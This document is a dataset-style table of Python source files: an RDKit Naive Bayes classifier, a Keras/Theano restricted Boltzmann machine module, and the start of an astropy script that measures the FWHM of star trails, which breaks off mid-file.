text stringlengths 12 1.05M | repo_name stringlengths 5 86 | path stringlengths 4 191 | language stringclasses 1 value | license stringclasses 15 values | size int32 12 1.05M | keyword listlengths 1 23 | text_hash stringlengths 64 64 |
|---|---|---|---|---|---|---|---|
# $Id$
#
# Copyright (C) 2004-2008 Greg Landrum and Rational Discovery LLC
# All Rights Reserved
#
""" Defines Naive Baysean classification model
Based on development in: Chapter 6 of "Machine Learning" by Tom Mitchell
"""
import numpy
from rdkit.ML.Data import Quantize
def _getBinId(val, qBounds) :
bid = 0
for bnd in qBounds:
if (val > bnd) :
bid += 1
return bid
# FIX: this class has not been updated to new-style classes
# (RD Issue380) because that would break all of our legacy pickled
# data. Until a solution is found for this breakage, an update is
# impossible.
class NaiveBayesClassifier:
    """Naive Bayes classifier over (optionally quantized) descriptor values.

    _NaiveBayesClassifier_s can save the following pieces of internal state,
    accessible via standard setter/getter functions:

      1) _Examples_: a list of examples which have been predicted
      2) _TrainingExamples_: list of training examples - the descriptor values of
         these examples are quantized based on info gain using ML/Data/Quantize.py
         if necessary
      3) _TestExamples_: the list of examples used to test the model
      4) _BadExamples_: list of examples that were incorrectly classified
      5) _QBoundVals_: quant bound values for each variable - a list of lists
      6) _QBounds_: number of bounds for each variable
    """

    def __init__(self, attrs, nPossibleVals, nQuantBounds, mEstimateVal=-1.0, useSigs=False):
        """Constructor

        Arguments:
          attrs: list of attribute (descriptor) indices the model uses
          nPossibleVals: number of possible values for each variable; the last
            entry is the number of outcome classes
          nQuantBounds: number of quantization bounds for each variable
            (0 -> the variable is already quantized)
          mEstimateVal: if > 0, apply the m-estimate correction to the
            conditional probabilities (Mitchell, "Machine Learning", 6.9.1.1)
          useSigs: if True, examples carry bit-vector signatures (eg[1]) rather
            than plain descriptor lists
        """
        self._attrs = attrs
        self._mEstimateVal = mEstimateVal
        self._useSigs = useSigs

        self._classProbs = {}

        self._examples = []
        self._trainingExamples = []
        self._testExamples = []
        self._badExamples = []

        self._QBoundVals = {}
        self._nClasses = nPossibleVals[-1]
        self._qBounds = nQuantBounds
        self._nPosVals = nPossibleVals
        self._needsQuant = 1

        self._name = ""
        self.mprob = -1.0

        # For the sake of efficiency the conditional probabilities are kept in
        # nested lists indexed [class][attribute][binId] instead of a
        # dictionary keyed on (class, attribute, binId) tuples.
        self._condProbs = [None] * self._nClasses
        for i in range(self._nClasses):
            if not (hasattr(self, '_useSigs') and self._useSigs):
                nA = max(self._attrs) + 1
                self._condProbs[i] = [None] * nA
                for j in range(nA):
                    nV = self._nPosVals[j]
                    if self._qBounds[j]:
                        nV = max(nV, self._qBounds[j] + 1)
                    self._condProbs[i][j] = [0.0] * nV
            else:
                # signature mode: each attribute is a single bit -> two bins
                self._condProbs[i] = {}
                for idx in self._attrs:
                    self._condProbs[i][idx] = [0.0] * 2

    def GetName(self):
        return self._name

    def SetName(self, name):
        self._name = name

    def NameModel(self, varNames):
        # NOTE: the misspelled name below is preserved deliberately; persisted
        # legacy models may depend on the exact string.
        self.SetName('NaiveBayesCalssifier')

    def GetExamples(self):
        return self._examples

    def SetExamples(self, examples):
        self._examples = examples

    def GetTrainingExamples(self):
        return self._trainingExamples

    def SetTrainingExamples(self, examples):
        self._trainingExamples = examples

    def GetTestExamples(self):
        return self._testExamples

    def SetTestExamples(self, examples):
        self._testExamples = examples

    def SetBadExamples(self, examples):
        self._badExamples = examples

    def GetBadExamples(self):
        return self._badExamples

    def _computeQuantBounds(self):
        """Compute quantization bounds for every attribute that needs them.

        For each attribute with a nonzero entry in self._qBounds, tries 1..n
        bounds with Quantize.FindVarMultQuantBounds and keeps the bound set
        with the maximum information gain; results go into self._QBoundVals.
        """
        neg = len(self._trainingExamples)
        natr = len(self._attrs)

        # collect the outcomes and descriptor values into an
        # (nExamples, nAttrs) array for column-wise processing
        allVals = numpy.zeros((neg, natr), 'd')
        res = []  # list of y values
        i = 0
        for eg in self._trainingExamples:
            res.append(eg[-1])
            j = 0
            for ai in self._attrs:
                val = eg[ai]
                allVals[i, j] = val
                j += 1
            i += 1

        # now loop over each of the columns and compute the bounds;
        # the number of bounds kept is the one with maximum info gain
        i = 0
        for ai in self._attrs:
            nbnds = self._qBounds[ai]
            if nbnds > 0:
                mbnds = []
                mgain = -1.0
                for j in range(1, nbnds + 1):
                    bnds, igain = Quantize.FindVarMultQuantBounds(allVals[:, i], j, res, self._nClasses)
                    if igain > mgain:
                        mbnds = bnds
                        mgain = igain
                self._QBoundVals[ai] = mbnds
            i += 1

    def trainModel(self):
        """Estimate the class priors and conditional probabilities.

        We assume at this point that the training examples have been set.
        Estimates the conditional probability of each (binned) descriptor
        component given an outcome class, and the prior of each class.
        """
        # first estimate the class probabilities
        n = len(self._trainingExamples)
        for i in range(self._nClasses):
            self._classProbs[i] = 0.0

        # find the bounds for each descriptor value if necessary
        if not self._useSigs and max(self._qBounds) > 0:
            self._computeQuantBounds()

        # now accumulate the counts
        ncls = {}
        incr = 1.0 / n
        for eg in self._trainingExamples:
            cls = eg[-1]
            self._classProbs[cls] += incr
            ncls[cls] = ncls.get(cls, 0) + 1
            tmp = self._condProbs[cls]
            if not self._useSigs:
                for ai in self._attrs:
                    bid = eg[ai]
                    if self._qBounds[ai] > 0:
                        bid = _getBinId(bid, self._QBoundVals[ai])
                    tmp[ai][bid] += 1.0
            else:
                for ai in self._attrs:
                    if eg[1].GetBit(ai):
                        tmp[ai][1] += 1.0
                    else:
                        tmp[ai][0] += 1.0

        # normalize the counts into conditional probabilities
        for cls in range(self._nClasses):
            # FIX: dict.has_key() was removed in Python 3; 'in' works in both
            if cls not in ncls:
                continue
            tmp = self._condProbs[cls]
            for ai in self._attrs:
                if not self._useSigs:
                    nbnds = self._nPosVals[ai]
                    if self._qBounds[ai] > 0:
                        nbnds = self._qBounds[ai]
                else:
                    nbnds = 2
                for bid in range(nbnds):
                    if self._mEstimateVal <= 0.0:
                        # simply the fraction of the time this descriptor
                        # component takes this value for examples of this class
                        tmp[ai][bid] /= ncls[cls]
                    else:
                        # m-estimate form - more appropriate for unbalanced data,
                        # see "Machine Learning" by Tom Mitchell section 6.9.1.1.
                        # pdesc is the prior probability of this component taking
                        # this value: 1/nPossible in the absence of other info.
                        pdesc = 0.0
                        if self._qBounds[ai] > 0:
                            pdesc = 1.0 / (1 + len(self._QBoundVals[ai]))
                        elif self._nPosVals[ai] > 0:
                            pdesc = 1.0 / (self._nPosVals[ai])
                        else:
                            # FIX: 'raise ValueError, msg' is a Python 3 syntax error
                            raise ValueError('Neither Bounds set nor data pre-quantized for attribute ' + str(ai))
                        tmp[ai][bid] += (self._mEstimateVal) * pdesc
                        tmp[ai][bid] /= (ncls[cls] + self._mEstimateVal)

    def ClassifyExamples(self, examples, appendExamples=0):
        """Classify a list of examples; returns a list of integer class ids."""
        preds = []
        for eg in examples:
            pred = self.ClassifyExample(eg, appendExamples)
            preds.append(int(pred))
        return preds

    def GetClassificationDetails(self):
        """returns the probability of the last prediction"""
        return self.mprob

    def ClassifyExample(self, example, appendExamples=0):
        """Classify an example by multiplying the conditional probabilities.

        The most likely class (the one with the largest probability) is returned.
        """
        if appendExamples:
            self._examples.append(example)

        clsProb = {}
        # FIX: dict.iteritems() was removed in Python 3; items() works in both
        for key, prob in self._classProbs.items():
            clsProb[key] = prob
            tmp = self._condProbs[key]
            for ai in self._attrs:
                if not (hasattr(self, '_useSigs') and self._useSigs):
                    bid = example[ai]
                    if self._qBounds[ai] > 0:
                        bid = _getBinId(bid, self._QBoundVals[ai])
                else:
                    if example[1].GetBit(ai):
                        bid = 1
                    else:
                        bid = 0
                clsProb[key] *= tmp[ai][bid]

        mkey = -1
        self.mprob = -1.0
        for key, prob in clsProb.items():
            if prob > self.mprob:
                mkey = key
                self.mprob = prob
        return mkey
| rdkit/rdkit-orig | rdkit/ML/NaiveBayes/ClassificationModel.py | Python | bsd-3-clause | 8,744 | [
"RDKit"
] | 80a7d2f8272bc24e6fb86ee9c4ff9ed8c4cfd0c3f75004795dd1512e98ae11c3 |
from __future__ import division
import numpy as np
import copy
import inspect
import types as python_types
import marshal
import sys
import warnings
from keras import activations, initializations, regularizers, constraints
from keras import backend as K
from keras.engine import InputSpec, Layer
from keras.layers.core import Dense
from keras_extensions.initializations import glorot_uniform_sigm
from keras_extensions.activations import nrlu
from .backend import random_binomial, random_normal
import theano
import theano.tensor as T
class RBM(Layer):
    """
    Bernoulli-Bernoulli Restricted Boltzmann Machine (RBM).
    """

    # keras.core.Layer part (modified from keras.core.Dense)
    # ------------------------------------------------------
    def __init__(self, hidden_dim, init='glorot_uniform',
                 activation='sigmoid', weights=None,
                 W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
                 activity_regularizer=None,
                 W_constraint=None, bx_constraint=None, bh_constraint=None,
                 input_dim=None, nb_gibbs_steps=1, persistent=False, batch_size=1,
                 scaling_h_given_x=1.0, scaling_x_given_h=1.0,
                 dropout=0.0,
                 **kwargs):
        self.p = dropout
        if 0.0 < self.p < 1.0:
            self.uses_learning_phase = True
        self.supports_masking = True

        self.nb_gibbs_steps = nb_gibbs_steps
        self.updates = []
        self.init = initializations.get(init)
        self.activation = activations.get(activation)
        self.hidden_dim = hidden_dim
        self.input_dim = input_dim
        self.batch_size = batch_size
        self.scaling_h_given_x = scaling_h_given_x
        self.scaling_x_given_h = scaling_x_given_h

        self.W_regularizer = regularizers.get(W_regularizer)
        self.bx_regularizer = regularizers.get(bx_regularizer)
        self.bh_regularizer = regularizers.get(bh_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)

        self.W_constraint = constraints.get(W_constraint)
        self.bx_constraint = constraints.get(bx_constraint)
        self.bh_constraint = constraints.get(bh_constraint)

        self.initial_weights = weights
        self.input_spec = [InputSpec(ndim=2)]

        if self.input_dim:
            kwargs['input_shape'] = (self.input_dim,)
        super(RBM, self).__init__(**kwargs)

        # W: (input_dim, hidden_dim); bx: visible bias; bh: hidden bias
        self.W = self.init((input_dim, self.hidden_dim),
                           name='{}_W'.format(self.name))
        self.bx = K.zeros((self.input_dim,),
                          name='{}_bx'.format(self.name))
        self.bh = K.zeros((self.hidden_dim,),
                          name='{}_bh'.format(self.name))
        self.trainable_weights = [self.W, self.bx, self.bh]

        self.is_persistent = persistent
        if self.is_persistent:
            # persistent contrastive divergence keeps the Gibbs chain state
            # between mini-batches
            self.persistent_chain = theano.shared(
                np.zeros((self.batch_size, self.input_dim), dtype=theano.config.floatX),
                borrow=True)

    def _get_noise_shape(self, x):
        # dropout noise has the same shape as its input (cf. keras Dropout)
        return None

    def build(self, input_shape):
        """Register regularizers and constraints once the input shape is known."""
        assert len(input_shape) == 2
        input_dim = input_shape[1]
        self.input_spec = [InputSpec(dtype=K.floatx(),
                                     shape=(None, input_dim))]

        self.regularizers = []
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        if self.bx_regularizer:
            self.bx_regularizer.set_param(self.bx)
            self.regularizers.append(self.bx_regularizer)
        if self.bh_regularizer:
            self.bh_regularizer.set_param(self.bh)
            self.regularizers.append(self.bh_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)

        self.constraints = {}
        if self.W_constraint:
            self.constraints[self.W] = self.W_constraint
        if self.bx_constraint:
            self.constraints[self.bx] = self.bx_constraint
        if self.bh_constraint:
            self.constraints[self.bh] = self.bh_constraint

        if self.initial_weights is not None:
            self.set_weights(self.initial_weights)
            del self.initial_weights

    def call(self, x, mask=None):
        """Forward pass: mean activation of the hidden units given visible x.

        FIX: the original computed K.dot(self.W, x) + self.bx, whose shapes
        ((input_dim, hidden_dim) . (batch, input_dim)) do not line up and whose
        result would not match get_output_shape_for(); use the hidden-unit
        pre-activation exactly as in sample_h_given_x().
        """
        y = K.dot(x, self.W) + self.bh
        output = self.activation(y)
        return output

    def get_output_shape_for(self, input_shape):
        assert input_shape and len(input_shape) == 2
        return (input_shape[0], self.hidden_dim)

    def get_config(self):
        config = {'output_dim': self.hidden_dim,
                  'init': self.init.__name__,
                  'activation': self.activation.__name__,
                  'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
                  'bx_regularizer': self.bx_regularizer.get_config() if self.bx_regularizer else None,
                  'bh_regularizer': self.bh_regularizer.get_config() if self.bh_regularizer else None,
                  'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
                  'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
                  'bx_constraint': self.bx_constraint.get_config() if self.bx_constraint else None,
                  'bh_constraint': self.bh_constraint.get_config() if self.bh_constraint else None,
                  'persistent': self.is_persistent,
                  'input_dim': self.input_dim}
        # FIX: the original called super(Dense, self), which skips Dense and
        # is wrong anyway since this class derives from Layer, not Dense
        base_config = super(RBM, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))

    # -------------
    # RBM internals
    # -------------

    def free_energy(self, x):
        """
        Compute free energy for Bernoulli RBM, given visible units.

        The marginal probability p(x) = sum_h 1/Z exp(-E(x, h)) can be re-arranged to the form
        p(x) = 1/Z exp(-F(x)), where the free energy
        F(x) = -sum_j=1^H log(1 + exp(x^T W[:,j] + bh_j)) - bx^T x,
        in case of the Bernoulli RBM energy function.
        """
        wx_b = K.dot(x, self.W) + self.bh
        hidden_term = K.sum(K.log(1 + K.exp(wx_b)), axis=1)
        vbias_term = K.dot(x, self.bx)
        return -hidden_term - vbias_term

    def sample_h_given_x(self, x):
        """
        Draw sample from p(h|x).

        For Bernoulli RBM the conditional probability distribution can be derived to be
        p(h_j=1|x) = sigmoid(x^T W[:,j] + bh_j).
        """
        # pre-sigmoid activation (returned for numerically stable cross-entropy)
        h_pre = K.dot(x, self.W) + self.bh
        # mean of the Bernoulli distribution (mean-field value)
        h_sigm = self.activation(self.scaling_h_given_x * h_pre)

        # dropout noise
        if 0.0 < self.p < 1.0:
            noise_shape = self._get_noise_shape(h_sigm)
            h_sigm = K.in_train_phase(K.dropout(h_sigm, self.p, noise_shape), h_sigm)

        # random sample:
        #   \hat{h} = 1, if p(h=1|x) > uniform(0, 1); 0 otherwise
        h_samp = random_binomial(shape=h_sigm.shape, n=1, p=h_sigm)
        return h_samp, h_pre, h_sigm

    def sample_x_given_h(self, h):
        """
        Draw sample from p(x|h).

        For Bernoulli RBM the conditional probability distribution can be derived to be
        p(x_i=1|h) = sigmoid(W[i,:] h + bx_i).
        """
        # pre-sigmoid activation (returned for numerically stable cross-entropy)
        x_pre = K.dot(h, self.W.T) + self.bx
        # mean of the Bernoulli distribution (mean-field value)
        x_sigm = K.sigmoid(self.scaling_x_given_h * x_pre)

        # random sample:
        #   \hat{x} = 1, if p(x=1|h) > uniform(0, 1); 0 otherwise
        x_samp = random_binomial(shape=x_sigm.shape, n=1, p=x_sigm)
        return x_samp, x_pre, x_sigm

    def gibbs_xhx(self, x0):
        """
        Perform one step of Gibbs sampling, starting from visible sample.

        h1 ~ p(h|x0)
        x1 ~ p(x|h1)
        """
        h1, h1_pre, h1_sigm = self.sample_h_given_x(x0)
        x1, x1_pre, x1_sigm = self.sample_x_given_h(h1)
        # pre and sigm are returned to compute cross-entropy
        return x1, x1_pre, x1_sigm

    def mcmc_chain(self, x, nb_gibbs_steps):
        """
        Perform Markov Chain Monte Carlo, run k steps of Gibbs sampling,
        starting from visible data, return point estimate at end of chain.

        x0 (data) -> h1 -> x1 -> ... -> xk (reconstruction, negative sample)
        """
        xi = x
        # FIX: xrange does not exist in Python 3
        for i in range(nb_gibbs_steps):
            xi, xi_pre, xi_sigm = self.gibbs_xhx(xi)
        x_rec, x_rec_pre, x_rec_sigm = xi, xi_pre, xi_sigm

        # avoid back-propagating gradient through the Gibbs sampling;
        # this is similar to T.grad(.., consider_constant=[chain_end]), but as
        # grad() is called in keras.optimizers.Optimizer, we do it here instead
        # to avoid having to change Keras' code
        x_rec = theano.gradient.disconnected_grad(x_rec)

        return x_rec, x_rec_pre, x_rec_sigm

    def contrastive_divergence_loss(self, x, dummy):
        """
        Compute contrastive divergence loss with k steps of Gibbs sampling (CD-k).

        Result is a Theano expression with the form loss = f(x).
        """
        if self.is_persistent:
            chain_start = self.persistent_chain
        else:
            chain_start = x

        def loss(chain_start, x):
            x_rec, _, _ = self.mcmc_chain(chain_start, self.nb_gibbs_steps)
            cd = K.mean(self.free_energy(x)) - K.mean(self.free_energy(x_rec))
            return cd, x_rec

        y, x_rec = loss(chain_start, x)

        if self.is_persistent:
            # advance the persistent chain to the latest negative sample
            self.updates = [(self.persistent_chain, x_rec)]

        return y

    def reconstruction_loss(self, x, dummy):
        """
        Compute binary cross-entropy between the binary input data and the
        reconstruction generated by the model.

        Result is a Theano expression with the form loss = f(x).
        Useful as a rough indication of training progress (see Hinton2010).
        Summed over feature dimensions, mean over samples.
        """
        def loss(x):
            _, pre, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
            # The sigmoid is applied here to the pre-sigmoid value rather than
            # inside the chain: Theano rewrites log(sigmoid(x)) = -softplus(-x)
            # for numerical stability, but cannot 'see' a sigmoid produced
            # inside a scan(); this value is only used for monitoring, not for
            # computing gradients.
            cross_entropy_loss = -T.mean(
                T.sum(x * T.log(T.nnet.sigmoid(pre)) +
                      (1 - x) * T.log(1 - T.nnet.sigmoid(pre)), axis=1))
            return cross_entropy_loss
        return loss(x)

    def free_energy_gap(self, x_train, x_test):
        """
        Computes the free energy gap between train and test set, F(x_test) - F(x_train).

        The ratio p(x_train)/p(x_test) = exp(-F(x_train) + F(x_test)) is free of
        the intractable partition function, so the gap is a practical overfitting
        monitor: it should stay around 0; a growing gap suggests overfitting
        (though the test-data probability may still be improving).

        See: Hinton, "A Practical Guide to Training Restricted Boltzmann Machines",
        UTML TR 2010-003, 2010, section 6.
        """
        return T.mean(self.free_energy(x_train)) - T.mean(self.free_energy(x_test))

    def get_h_given_x_layer(self, as_initial_layer=False):
        """
        Generates a new Dense Layer that computes mean of Bernoulli distribution p(h|x), ie. p(h=1|x).
        """
        if as_initial_layer:
            layer = Dense(input_dim=self.input_dim, output_dim=self.hidden_dim,
                          activation=self.activation,
                          weights=[self.W.get_value(), self.bh.get_value()])
        else:
            layer = Dense(output_dim=self.hidden_dim, activation=self.activation,
                          weights=[self.W.get_value(), self.bh.get_value()])
        return layer

    def get_x_given_h_layer(self, as_initial_layer=False):
        """
        Generates a new Dense Layer that computes mean of Bernoulli distribution p(x|h), ie. p(x=1|h).
        """
        if as_initial_layer:
            layer = Dense(input_dim=self.hidden_dim, output_dim=self.input_dim,
                          activation='sigmoid',
                          weights=[self.W.get_value().T, self.bx.get_value()])
        else:
            layer = Dense(output_dim=self.input_dim, activation='sigmoid',
                          weights=[self.W.get_value().T, self.bx.get_value()])
        return layer

    def return_reconstruction_data(self, x):
        """Run the Gibbs chain on x and return the reconstructed (negative) sample."""
        x_rec, _, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
        return x_rec
class GBRBM(RBM):
    """
    Gaussian-Bernoulli Restricted Boltzmann Machine (GB-RBM).

    This GB-RBM does not learn variances of Gaussian units, but instead fixes them to 1 and
    uses noise-free reconstructions. Input data should be pre-processed to have zero mean
    and unit variance along the feature dimensions.

    See: Hinton, "A Practical Guide to Training Restricted Boltzmann Machines",
    UTML TR 2010-003, 2010, section 13.2.
    """

    def __init__(self, hidden_dim, init='glorot_uniform',
                 activation='sigmoid', weights=None,
                 W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
                 activity_regularizer=None,
                 W_constraint=None, bx_constraint=None, bh_constraint=None,
                 input_dim=None, nb_gibbs_steps=1, persistent=True, batch_size=1,
                 scaling_h_given_x=1.0, scaling_x_given_h=1.0,
                 dropout=0.0,
                 **kwargs):
        self.nb_gibbs_steps = nb_gibbs_steps
        super(GBRBM, self).__init__(hidden_dim=hidden_dim, init=init,
                                    activation=activation, weights=weights,
                                    input_dim=input_dim, nb_gibbs_steps=nb_gibbs_steps,
                                    scaling_h_given_x=scaling_h_given_x,
                                    scaling_x_given_h=scaling_x_given_h,
                                    persistent=persistent, batch_size=batch_size,
                                    dropout=dropout,
                                    **kwargs)

    # -------------
    # RBM internals (sample_h_given_x, gibbs_xhx, mcmc_chain, free_energy_gap
    # and get_h_given_x_layer are inherited unchanged from the BB-RBM)
    # -------------

    def free_energy(self, x):
        """Free energy of the GB-RBM (visible variances fixed to 1)."""
        wx_b = K.dot(x, self.W) + self.bh
        vbias_term = 0.5 * K.sum((x - self.bx) ** 2, axis=1)
        hidden_term = K.sum(K.log(1 + K.exp(wx_b)), axis=1)
        return -hidden_term + vbias_term

    def sample_x_given_h(self, h):
        """
        Draw sample from p(x|h).

        For Gaussian-Bernoulli RBM the conditional probability distribution can be derived to be
        p(x_i|h) = norm(x_i; sigma_i W[i,:] h + bx_i, sigma_i^2).

        Variances of the Gaussian units are not learned (fixed to 1 in the energy
        function); instead of sampling from the Gaussians we take their means, so the
        reconstruction is noise-free. The last two returns are dummy values required
        by the Bernoulli base-class interface (returning x_samp, None, None doesn't work).
        """
        x_mean = K.dot(h, self.W.T) + self.bx
        x_samp = self.scaling_x_given_h * x_mean
        return x_samp, x_samp, x_samp

    def reconstruction_loss(self, x, dummy):
        """
        Compute mean squared error between input data and the reconstruction
        generated by the model.

        Result is a Theano expression with the form loss = f(x).
        Useful as a rough indication of training progress (see Hinton2010).
        Mean over samples and feature dimensions.
        """
        def loss(x):
            x_rec, _, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
            # FIX: the original used K.sqrt(x - x_rec), which is not a squared
            # error and produces NaN for negative differences; MSE needs K.square
            return K.mean(K.square(x - x_rec))
        return loss(x)

    def get_x_given_h_layer(self, as_initial_layer=False):
        """
        Generates a new Dense Layer that computes mean of Gaussian distribution p(x|h).
        """
        if not as_initial_layer:
            layer = Dense(output_dim=self.input_dim, activation='linear',
                          weights=[self.W.get_value().T, self.bx.get_value()])
        else:
            layer = Dense(input_dim=self.hidden_dim, output_dim=self.input_dim,
                          activation='linear',
                          weights=[self.W.get_value().T, self.bx.get_value()])
        return layer
class GNRRBM(GBRBM):
    """
    Gaussian-visible / noisy-rectified-linear-hidden RBM.

    Hidden units are sampled with a noisy ReLU (NReLU) instead of Bernoulli
    draws; visible reconstructions are the noise-free Gaussian means inherited
    from the GB-RBM base class.
    """

    def __init__(self, hidden_dim, init='glorot_uniform',
                 activation='sigmoid', weights=None,
                 W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
                 activity_regularizer=None,
                 W_constraint=None, bx_constraint=None, bh_constraint=None,
                 input_dim=None, nb_gibbs_steps=1, persistent=True, batch_size=1,
                 scaling_h_given_x=1.0, scaling_x_given_h=1.0,
                 dropout=0.0,
                 **kwargs):
        self.nb_gibbs_steps = nb_gibbs_steps
        # NOTE: the parent is deliberately configured with a single,
        # non-persistent Gibbs step regardless of the arguments received here
        # (behaviour preserved from the original implementation).
        super(GNRRBM, self).__init__(hidden_dim=hidden_dim, init=init,
                                     activation=activation, weights=weights,
                                     input_dim=input_dim, nb_gibbs_steps=1,
                                     scaling_h_given_x=scaling_h_given_x,
                                     scaling_x_given_h=scaling_x_given_h,
                                     persistent=False, batch_size=batch_size,
                                     dropout=dropout,
                                     **kwargs)

    # -------------
    # RBM internals
    # -------------

    def sample_h_given_x(self, x):
        """Draw a noisy-ReLU sample of the hidden units given visible units x."""
        pre_activation = K.dot(x, self.W) + self.bh
        rectified_mean = K.maximum(self.scaling_h_given_x * pre_activation, 0)
        noisy_sample = nrlu(pre_activation)
        return noisy_sample, pre_activation, rectified_mean

    def sample_x_given_h(self, h):
        """Noise-free Gaussian-mean reconstruction of the visible units given h."""
        reconstruction = self.scaling_x_given_h * (K.dot(h, self.W.T) + self.bx)
        # the triple return matches the Bernoulli base-class interface
        return reconstruction, reconstruction, reconstruction

    def get_h_given_x_layer(self, as_initial_layer=False):
        """Build a Dense layer computing the mean hidden activation (ReLU)."""
        dense_weights = [self.W.get_value(), self.bh.get_value()]
        if not as_initial_layer:
            return Dense(output_dim=self.hidden_dim, activation="relu",
                         weights=dense_weights)
        return Dense(input_dim=self.input_dim, output_dim=self.hidden_dim,
                     activation="relu", weights=dense_weights)
| bnsnapper/keras_extensions | keras_extensions/rbm.py | Python | mit | 21,081 | [
"Gaussian"
] | d17273b8229d057e1b08f32e3b9dab00e48f600720c12d0f316de6c292dcab62 |
#!/usr/bin/python
# coding=utf-8
__author__ = 'Didier Walliang'
import math
import numpy as np
import matplotlib.pyplot as plt
import os.path
from matplotlib import dates
from astropy.io import fits
from astropy.modeling import models, fitting
from astropy.convolution import Gaussian2DKernel
from astropy.stats import gaussian_fwhm_to_sigma
from astropy import units as u
from astropy.time import Time
from photutils import segment_properties
from photutils import detect_sources
from photutils import detect_threshold
# class definitions
class Slice:
    """Slice of a star trail: one row of pixels taken across the trail."""

    def __init__(self, positions, intensities, approximate_fwhm_px=6.0):
        """
        Construct a Slice object.

        :param positions: list of the position of each intensity in the image
        :param intensities: list of intensities in ADU
        :param approximate_fwhm_px: float, approximate FWHM in pixel to help to fit the gaussian
        :return:
        """
        self.positions = positions
        self.intensities = intensities
        self.approximative_fwhm_px = approximate_fwhm_px

        # move the y data to the axis to allow the fitting
        # (because the fitting doesn't work if the data are not near the x axis)
        min_intensity = min(self.intensities)
        self.relative_intensities = self.intensities - min_intensity

    def print_positions(self):
        # FIX: Python 2 'print' statements are syntax errors under Python 3;
        # single-argument print() behaves identically on both versions
        print("positions = %s " % self.positions)

    def print_intensities(self):
        print("intensities = %s " % self.intensities)

    def print_relative_intensities(self):
        print("relative intensities = %s " % self.relative_intensities)

    def fit_gaussian(self):
        """Fit the data using a Gaussian"""
        max_relative_intensity = max(self.relative_intensities)
        mean_position = sum(self.positions) / len(self.positions)
        # convert the FWHM guess to a standard-deviation guess for the fitter
        approximate_stddev = self.approximative_fwhm_px / (2 * np.sqrt(2 * np.log(2)))
        gaussian_init = models.Gaussian1D(amplitude=max_relative_intensity,
                                          mean=mean_position,
                                          stddev=approximate_stddev)
        fit_gaussian = fitting.LevMarLSQFitter()
        self.gaussian = fit_gaussian(gaussian_init, self.positions, self.relative_intensities)

    def fwhm_from_gaussian(self):
        """FWHM calculation with the best-fit model"""
        sigma = self.gaussian.stddev.value
        self.fwhm_in_px = 2 * np.sqrt(2 * np.log(2)) * sigma

    def print_graph(self):
        """Plot the data points together with the fitted bell curve."""
        # 200 dots from first to last position to have a smooth bell curve
        first_position = self.positions[0]
        last_position = self.positions[len(self.positions) - 1]
        finer_positions = np.linspace(first_position, last_position, 200)

        plt.figure(1)
        plt.plot(self.positions, self.relative_intensities, 'ko')
        plt.plot(finer_positions, self.gaussian(finer_positions))
        plt.xlabel('Position (pixel)')
        plt.ylabel('Relative intensity (ADU)')
        plt.show()
class StarTrail:
    """A star trail"""

    def __init__(self, startrailcoordinates, img_data, sampling):
        """
        Construct a StarTrail object.

        :param startrailcoordinates: StarTrailCoordinates object
            Coordinates of the star trail in the image
        :param img_data: image data array (indexed [y, x])
        :param sampling: sampling in arcsec by pixel
        :return:
        """
        self.xmin = startrailcoordinates.xmin
        self.xmax = startrailcoordinates.xmax
        self.ymin = startrailcoordinates.ymin
        self.ymax = startrailcoordinates.ymax
        self.img_data = img_data
        self.sampling = sampling
        self.fwhms = np.array([])

    def calculate_fwhms(self):
        """Calculate the FWHMs along the star trail, one per image row."""
        self.fwhms = np.array([])
        for y in range(self.ymin, self.ymax):
            x_positions = np.array([])
            intensities = np.array([])
            for x in range(self.xmin, self.xmax):
                x_positions = np.append(x_positions, x)
                intensities = np.append(intensities, self.img_data[y, x])
            # fit a Gaussian across the trail for this row
            # (renamed from 'slice' to avoid shadowing the builtin)
            row_slice = Slice(x_positions, intensities)
            row_slice.fit_gaussian()
            row_slice.fwhm_from_gaussian()
            fwhm_in_arcsec = self.sampling * row_slice.fwhm_in_px
            self.fwhms = np.append(self.fwhms, fwhm_in_arcsec)

        # summary statistics over the per-row measurements
        self.fwhm_samples = self.fwhms.size
        self.fwhm_min = np.min(self.fwhms)
        self.fwhm_max = np.max(self.fwhms)
        self.fwhm_mean = np.mean(self.fwhms)
        self.fwhm_median = np.median(self.fwhms)
        self.fwhm_stddev = np.std(self.fwhms)

    def print_fwhms_results(self):
        """Print the min, max, mean, median and standard deviation of the FWHMs measurement"""
        # FIX: Python 2 'print' statements -> print() function (identical
        # output on Python 2 and 3 for a single argument)
        print("Samples = %i " % self.fwhm_samples)
        print("FWHM min = %f arcsec " % self.fwhm_min)
        print("FWHM max = %f arcsec " % self.fwhm_max)
        print("FWHM mean = %f arcsec " % self.fwhm_mean)
        print("FWHM median = %f arcsec " % self.fwhm_median)
        print("FWHM standard deviation = %f arcsec " % self.fwhm_stddev)

    def print_fwhms_graph(self):
        """Plot the FWHM with the best-fit model along the star trail"""
        plt.figure(1)
        plt.plot(self.fwhms, 'ko')
        plt.xlabel('Measure number')
        plt.ylabel('FWHM (arcsec)')
        plt.show()
class StarTrailCoordinates:
    """Bounding box of a star trail, in image pixel coordinates."""

    def __init__(self, xmin, xmax, ymin, ymax):
        self.xmin, self.xmax = xmin, xmax
        self.ymin, self.ymax = ymin, ymax

    def __str__(self):
        box = (self.xmin, self.xmax, self.ymin, self.ymax)
        return "xmin = %i ; xmax = %i ; ymin = %i ; ymax = %i" % box
class TrailsImage:
    """An image containing star trails."""

    def __init__(self, data, sampling, target_fwhm_arcsec, length_x_axis):
        """
        Construct a TrailsImage object.

        :param data: image data array
        :param sampling: sampling in arcsec by pixel
        :param target_fwhm_arcsec: estimated FWHM in arcsec (to help the calculation)
        :param length_x_axis: length of the X axis
        :return:
        """
        self.data = data
        self.sampling = sampling
        self.target_fwhm_arcsec = target_fwhm_arcsec
        self.length_x_axis = length_x_axis

